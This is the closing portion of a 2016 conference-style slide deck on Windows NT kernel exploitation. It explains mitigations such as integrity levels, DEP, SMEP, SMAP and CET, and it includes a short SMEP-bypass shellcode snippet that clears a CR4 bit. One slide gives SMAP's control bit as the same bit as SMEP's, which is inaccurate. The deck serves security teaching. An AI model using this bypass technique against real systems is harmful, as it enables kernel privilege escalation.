techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Integrity levels

Implemented since Windows VistaKernel exploit mitigation since Windows 8.1Processes that run under low integrity level cannot getkernel addresses by calling NtQuerySystemInformation

Figure 5:Integrity levelsAdrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 39 / 47

Page 40: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

DEP/NX

NX bitprevents code execution in DATA areas like STACK, HEAPetc.

Figure 6:DEP

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 40 / 47

Page 41: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Supervisor Mode Execution Prevention

Implemented by Intel CPU since Ivy BridgeSupported since Windows 8The idea is to separate executable kernel space fromexecutable user spaceOnly code located in kernel space can be executed in kernelmodeIt’s not possible anymore to jump directly in an user bu�erBit #20 of CR4Use ROP to bypass

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 41 / 47

Page 42: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

SMEP bypass

Hack In The Box Magazine #3

mov eax, cr4btr eax, 20mov cr4, eaxjmp 0x0BAAAAAD

Put this shellcode in reserved object(NtQueueApcThreadEx)Obtain the address of the object structure by callingNtQuerySystemInformation

NtQueueApcThreadEx(HANDLE hThread, HANDLE hApcReserve,PVOID ApcRoutine, PVOID ApcArg1, PVOID ApcArg2, PVOID ApcArg3);

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 42 / 47

Page 43: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Supervisor Mode Access Prevention

Same as SMEP but for DATABit #20 of CR4

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 43 / 47

Page 44: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Control-flow Enforcement Technology

Works on legacy platforms without changesCET defines a second stack (shadow stack) exclusively usedfor control transfer operationsNew register: SSPWhen CET is enabled CALL instruction pushes the returnaddress into both stackRET instruction pops return address from both stack

if the two addresses match, execution is transferred to thisaddress

You cannot switch or modify the shadow stack

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 44 / 47

Page 45: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Conclusion

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 45 / 47

Page 46: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Conclusion

New mitigations and security measures from Microsoft andIntel make exploitation harder

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 46 / 47

Page 47: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Thanks

ReferencesWindows Internals 6th editionMWR labs Windows 8 Kernel Memory Protections BypassCET paper

ContactIRC: [email protected]: [email protected]: @0x2Adr1

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 47 / 47